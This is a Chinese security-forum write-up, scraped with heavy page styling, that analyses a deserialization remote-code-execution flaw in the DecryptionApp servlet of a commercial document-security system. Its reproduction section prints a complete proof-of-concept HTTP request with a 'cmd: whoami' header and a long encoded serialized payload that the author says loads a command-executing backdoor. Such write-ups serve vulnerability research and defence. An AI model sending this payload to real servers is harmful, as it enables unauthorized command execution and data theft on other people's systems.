pV7vmLf3qswfeK3RKzk2JwmjWY6TA2Bdw9EcgDcgptutIo7tpwzv3t8a6l7ea5VyxaeqFRPyZ/840g6R8NvbH7p4vnu1et/eXWLb1jvoZvYx8KRqjnSXGvOCJYBL8wJGwQzhMuFq6G2mZ6E9gDaRhlUWMmzS6bSbonRI0iVD4C9RQTgzQdywxSfyAb4IcQbcbadmCXxTKJGSQWNbSQCLR
<style>@-moz-keyframes blink{50%{background-color:transparent}}@-webkit-keyframes blink{50%{background-color:transparent}}@keyframes blink{50%{background-color:transparent}}@media print{}.markdown-body{color-scheme:light;--color-prettylights-syntax-comment:#6e7781;--color-prettylights-syntax-constant:#0550ae;--color-prettylights-syntax-entity:#8250df;--color-prettylights-syntax-storage-modifier-import:#24292f;--color-prettylights-syntax-entity-tag:#116329;--color-prettylights-syntax-keyword:#cf222e;--color-prettylights-syntax-string:#0a3069;--color-prettylights-syntax-variable:#953800;--color-prettylights-syntax-brackethighlighter-unmatched:#82071e;--color-prettylights-syntax-invalid-illegal-text:#f6f8fa;--color-prettylights-syntax-invalid-illegal-bg:#82071e;--color-prettylights-syntax-carriage-return-text:#f6f8fa;--color-prettylights-syntax-carriage-return-bg:#cf222e;--color-prettylights-syntax-string-regexp:#116329;--color-prettylights-syntax-markup-list:#3b2300;--color-prettylights-syntax-markup-heading:#0550ae;--color-prettylights-syntax-markup-italic:#24292f;--color-prettylights-syntax-markup-bold:#24292f;--color-prettylights-syntax-markup-deleted-text:#82071e;--color-prettylights-syntax-markup-deleted-bg:#FFEBE9;--color-prettylights-syntax-markup-inserted-text:#116329;--color-prettylights-syntax-markup-inserted-bg:#dafbe1;--color-prettylights-syntax-markup-changed-text:#953800;--color-prettylights-syntax-markup-changed-bg:#ffd8b5;--color-prettylights-syntax-markup-ignored-text:#eaeef2;--color-prettylights-syntax-markup-ignored-bg:#0550ae;--color-prettylights-syntax-meta-diff-range:#8250df;--color-prettylights-syntax-brackethighlighter-angle:#57606a;--color-prettylights-syntax-sublimelinter-gutter-mark:#8c959f;--color-prettylights-syntax-constant-other-reference-link:#0a3069;--color-fg-default:#24292f;--color-fg-muted:#57606a;--color-fg-subtle:#6e7781;--color-canvas-default:#ffffff;--color-canvas-subtle:#f6f8fa;--color-border-default:#d0d7de;--color-border-muted:hsl(210,18%,87%);--color-neutral-muted:rgba(175,184,193,0.2);--color-accent-fg:#0969da;--color-accent-emphasis:#0969da;--color-attention-subtle:#fff8c5;--color-danger-fg:#cf222e}.markdown-body{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;margin:0;color:var(--color-fg-default);background-color:var(--color-canvas-default);font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Helvetica,Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji";font-size:16px;line-height:1.5;word-wrap:break-word}.markdown-body strong{font-weight:600}.markdown-body h1{margin:0.67em 0;padding-bottom:0.3em;font-size:2em;border-bottom:1px solid var(--color-border-muted)}.markdown-body img{border-style:none;max-width:100%;-webkit-box-sizing:content-box;box-sizing:content-box;background-color:var(--color-canvas-default)}.markdown-body ::-webkit-input-placeholder{color:inherit;opacity:0.54}.markdown-body ::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}.markdown-body h1,.markdown-body h2,.markdown-body h3{margin-top:24px;margin-bottom:16px;font-weight:600;line-height:1.25}.markdown-body h2{font-weight:600;padding-bottom:0.3em;font-size:1.5em;border-bottom:1px solid var(--color-border-muted)}.markdown-body h3{font-weight:600;font-size:1.25em}.markdown-body ol{padding-left:2em}.markdown-body code{font-family:ui-monospace,SFMono-Regular,SF Mono,Menlo,Consolas,Liberation Mono,monospace}.markdown-body ::-webkit-input-placeholder{color:var(--color-fg-subtle);opacity:1}.markdown-body ::placeholder{color:var(--color-fg-subtle);opacity:1}.markdown-body::before{display:table;content:""}.markdown-body::after{display:table;clear:both;content:""}.markdown-body>*:first-child{margin-top:0!important}.markdown-body>*:last-child{margin-bottom:0!important}.markdown-body p,.markdown-body ol{margin-top:0;margin-bottom:16px}.markdown-body li+li{margin-top:0.25em}.markdown-body code{padding:0.2em 0.4em;margin:0;font-size:85%;background-color:var(--color-neutral-muted);border-radius:6px}.markdown-body ::-webkit-calendar-picker-indicator{-webkit-filter:invert(50%);filter:invert(50%)
<style>#md_view{padding:0 20px}#md_view img:hover{cursor:pointer}</style>
<!--[if lt IE 9]>
    <script src="/static/js/html5shiv.min.js"></script>
    <script src="/static/js/respond.min.js"></script>
    <![endif]-->
<style>.hot{z-index:10}</style>
<style>html #layuicss-skinlayercss{display:none;position:absolute;width:1989px}@-webkit-keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);-ms-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1)}}@-webkit-keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);-ms-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);-ms-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);-ms-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);-ms-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);-ms-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);-ms-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);-ms-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes shake{0%,100%{-webkit-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);transform:translateX(10px)}}@keyframes shake{0%,100%{-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);-ms-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);-ms-transform:translateX(10px);transform:translateX(10px)}}@-webkit-keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);transform:scale(.7)}30%{-webkit-transform:scale(1.05);transform:scale(1.05)}0%{-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);-ms-transform:scale(.7);transform:scale(.
 * Waves v0.7.5
 * http://fian.my.id/Waves
 * 
 * Copyright 2014-2016 Alfiana E. Sibuea and other contributors
 * Released under the MIT license
 * https://github.com/fians/Waves/blob/master/LICENSE
 */</style><style>@media (max-height:620px){}@media (max-height:783px){}@-webkit-keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}@keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}</style><style>@-webkit-keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@media (pointer:coarse){}</style><style>:root{--sr-annote-color-0:#b4d9fb;--sr-annote-color-1:#ffeb3b;--sr-annote-color-2:#a2e9f2;--sr-annote-color-3:#a1e0ff;--sr-annote-color-4:#a8ea68;--sr-annote-color-5:#ffb7da}</style><style>@-webkit-keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@-webkit-keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@-webkit-keyframes fadeOut{0%{opacity:1}to{opacity:0}}@keyframes fadeOut{0%{opacity:1}to{opacity:0}}@-webkit-keyframes fadeIn{0%{opacity:0}to{opacity:1}}@keyframes fadeIn{0%{opacity:0}to{opacity:1}}@-webkit-keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}@keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:tra
<body>
<div class="global-nav mb-50">
 <nav class="navbar navbar-inverse navbar-fixed-top">
 <div class="container nav">
 <div class="visible-xs header-response sf-hidden">
 
 
 
 
 </div>
 <div class="row hidden-xs">
 <div class="col-sm-9 col-md-9 col-lg-9">
 <div class=navbar-header>
 <button type=button class="navbar-toggle collapsed sf-hidden" data-toggle=collapse data-target=#global-navbar>
 
 
 
 
 </button>
 <div class=logo><a class="navbar-brand logo" href=https://forum.butian.net/></a></div>
 </div>
 <div class="collapse navbar-collapse" id=global-navbar>
 <ul class="nav navbar-nav">
 <li><a href=https://forum.butian.net/>首页 <span class=sr-only>(current)</span></a></li>
 
 
 
 <li><a href=https://forum.butian.net/questions>问答</a></li>
 
 
 
 <li><a href=https://forum.butian.net/shop>商城</a></li>
 
 <li><a href=https://forum.butian.net/community>实战攻防技术</a></li>
 <li><a href=https://forum.butian.net/articles>漏洞分析与复现</a>
 <span class=hot>NEW</span>
 </li>
 <li><a href=https://forum.butian.net/movable>活动</a></li>
 <li><a href=https://forum.butian.net/questions/Play>摸鱼办</a>
 
 </li>
 </ul>
 <form role=search id=top-search-form action=https://forum.butian.net/search method=GET class="navbar-form hidden-sm hidden-xs pull-right">
 <span class="btn btn-link"><span class=sr-only>搜索</span><span class="glyphicon glyphicon-search"></span></span>
 <input type=text name=word id=searchBox class=form-control placeholder value>
 </form>
 </div>
 </div>
 
 </div>
 </div>
 </nav>
</div>
<div class="top-alert mt-60 clearfix text-center">
 <!--[if lt IE 9]>
    <div class="alert alert-danger topframe" role="alert">你的浏览器实在<strong>太太太太太太旧了</strong>，放学别走，升级完浏览器再说
        <a target="_blank" class="alert-link" href="http://browsehappy.com">立即升级</a>
    </div>
    <![endif]-->
 
 </div>
<div class=wrap>
 <div class=container>
 <div class="row mt-10">
 <div class="col-xs-12 col-md-9 main" style=width:100%>
 <div class=widget-article>
 <h3 class="title word-wrap">某通电子文档安全管理系统DecryptionApp反序列化漏洞RCE</h3>
 <ul class=taglist-inline>
 <li class=tagPopup><a class=tag href=https://forum.butian.net/topic/48>漏洞分析</a></li>
 </ul>
 <div class="content mt-10">
 <div class="quote mb-20">
 某通电子文档安全管理系统DecryptionApp反序列化漏洞RCE
 </div>
 <textarea id=md_view_content style=display:none value="某通电子文档安全管理系统DecryptionApp反序列化漏洞RCE
==================================

**前情提要**：某通是使用了servlet框架，一般都是先去web.xml寻找相关路由进而确定代码的位置

代码分析
----

首先进入到WEB\_INF的web.xml文件中，ctrl+F搜索`DecryptionApp`

![image-20240812154352756](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-1f935b259ffe2b36ead8e484f642ff5b4329342f.png)

ctrl点击进入到该这个`com.esafenet.workflow.servlet.DecryptionAppServlet`中,该类继承了`HttpServlet`类，那我们重点关注的就是前端交互的方法即`service`方法中，在该方法中有我们可以控制的参数`request`

![image-20240812154512539](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-b88f59af4fda6ece1d980fa90dfbd6c7bd0b6af9.png)

现在就详细分析下这个`service`方法中的内容

![image-20240812155048535](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-54dbb648a23c634b56b7159ce85c927eafcf43b0.png)

**分析**：我们先分析从65-83行的内容，该部分就是先后创建了以一个实体类`DecryptionApp`,一个List列表，一个实体类`DecryptionAppResp`，之后从前端传过来的数据`request`利用`getXMLFromRequest`方法提取XML格式的字符串数据并利用`fromXML`其将转换为一个`DecryptionApp`对象将其赋值给`dec`

接着分析84-109行

![image-20240812155704650](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-7b0bcb5ec5eec41a0ec0fe0baf5b5092e96c2abd.png)

**分析**：先后创建了`Flow`和`FlowDetail`的实例化对象，这两个类都继承了`Serializable`接口，之后获取dec的`UserName`和`Files`的值并且设置了`APPDate`,接着判断list参数是否为空，不为空就是进入for循环中。该for循环中处理了与审批流程相关的文件上传(即list列表中的内容)，它检查文件是否重复，若存在这向前端发送相关的XML数据，若不存在就构建出文件路径和列表字符串。

![image-20240812164028115](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-5138bc0b731fc5a13fbb263316a9af259fd9038f.png)

该代码并没有对前端的数据进行任何的过滤只是进行了简单的数据库查重，这就触发了我们的文件上传漏洞，同时这个Flow类继承了Serialization的接口存在反序列化漏洞

接着从111-270行，因为内容太多并且对我们的漏洞利用没有太大作用我们就简单说一下，这段代码就是处理了工作流(Flow)相关的审批流程包括了审批者的确定、审批级别的分配以及审批状态的初始化

![image-20240812161608658](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-f1d2241a4678c6dbaee950c372920c4efdfd4f1f.png)

接着就是到265-297代码的分析

![image-20240812163514010](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-dd692f03ca1d48656bd7afa01389b7203bd16f30.png)

**分析**：该部分的内容就是将模板名称、标志位以及之前的文件列表字符串设置到工作流对象flow对象中，接着就是进行sql数据库的连接以及调用`flowDao`的`addFlow`方法将`flow`对象添加到数据库。如果操作成功最后将我们的数据以XML的形式反应给前端

总结
--

该漏洞的形成利用了两个点

1. 在对前端输入的内容中，没有对文件的内容等方法方面进行相关的限制，导致可以上传任意的文件
2. Flow类中继承了`serialize`接口，我们在上传的参数中若存在序列化的内容即可利用它来进行反序列操作，进而造成相关数据的窃取

漏洞复现
----

**poc**

POST /CDGServer3/DecryptionApp?command=GETSYSTEMINFO HTTP/1.1

Host: your-ip

User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36

Accept-Encoding: gzip, deflate, br

Connection: close

Content-Type: text/xml

cmd: whoami

​

NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMI

![微信图片_20240812164526](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-aa1e68bf504d8d5023c38103ac21f66a8ac68e2e.png)

### poc的分析

相信大家在这里或多或少对这个poc不大理解，我们对该poc分析一下

我们使用工具对该poc进行解码操作，得到如下内容

![image-20240812164946571](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-74a26f6d90021b0377427586938d8d6546daed4f.png)

![image-20240812170153604](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-3c7d549d69f112d6dd302bfa420c88eed66932c8.png)

在`<byte-array>`发现了类似于base64编码的内容，我们对其进行解码操作，发现解码之后是一个.class文件

![微信图片_20240812165145](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-a7581153f62ba64cc4372eb3684e8f9480776c61.png)

接着我们利用反编译工具对该.class文件进行反编译操作，得到如下内容

![image-20240812165405021](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-3087defa29affb13b68b300d95a487e2be753efc.png)

分析：该段代码它包含了一个后门，允许攻击者在请求头中发送一个cmd的参数，代码获取名为`cmd`的请求头的值，之后根据操作系统类型（Linux或Windows），`exec()`方法构造不同的命令执行格式。攻击者可以输入一些危险的指令进而获取到对方的一些敏感信息">某通电子文档安全管理系统DecryptionApp反序列化漏洞RCE
==================================

**前情提要**：某通是使用了servlet框架，一般都是先去web.xml寻找相关路由进而确定代码的位置

代码分析
----

首先进入到WEB\_INF的web.xml文件中，ctrl+F搜索`DecryptionApp`

![image-20240812154352756](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-1f935b259ffe2b36ead8e484f642ff5b4329342f.png)

ctrl点击进入到该这个`com.esafenet.workflow.servlet.DecryptionAppServlet`中,该类继承了`HttpServlet`类，那我们重点关注的就是前端交互的方法即`service`方法中，在该方法中有我们可以控制的参数`request`

![image-20240812154512539](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-b88f59af4fda6ece1d980fa90dfbd6c7bd0b6af9.png)

现在就详细分析下这个`service`方法中的内容

![image-20240812155048535](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-54dbb648a23c634b56b7159ce85c927eafcf43b0.png)

**分析**：我们先分析从65-83行的内容，该部分就是先后创建了以一个实体类`DecryptionApp`,一个List列表，一个实体类`DecryptionAppResp`，之后从前端传过来的数据`request`利用`getXMLFromRequest`方法提取XML格式的字符串数据并利用`fromXML`其将转换为一个`DecryptionApp`对象将其赋值给`dec`

接着分析84-109行

![image-20240812155704650](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-7b0bcb5ec5eec41a0ec0fe0baf5b5092e96c2abd.png)

**分析**：先后创建了`Flow`和`FlowDetail`的实例化对象，这两个类都继承了`Serializable`接口，之后获取dec的`UserName`和`Files`的值并且设置了`APPDate`,接着判断list参数是否为空，不为空就是进入for循环中。该for循环中处理了与审批流程相关的文件上传(即list列表中的内容)，它检查文件是否重复，若存在这向前端发送相关的XML数据，若不存在就构建出文件路径和列表字符串。

![image-20240812164028115](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-5138bc0b731fc5a13fbb263316a9af259fd9038f.png)

该代码并没有对前端的数据进行任何的过滤只是进行了简单的数据库查重，这就触发了我们的文件上传漏洞，同时这个Flow类继承了Serialization的接口存在反序列化漏洞

接着从111-270行，因为内容太多并且对我们的漏洞利用没有太大作用我们就简单说一下，这段代码就是处理了工作流(Flow)相关的审批流程包括了审批者的确定、审批级别的分配以及审批状态的初始化

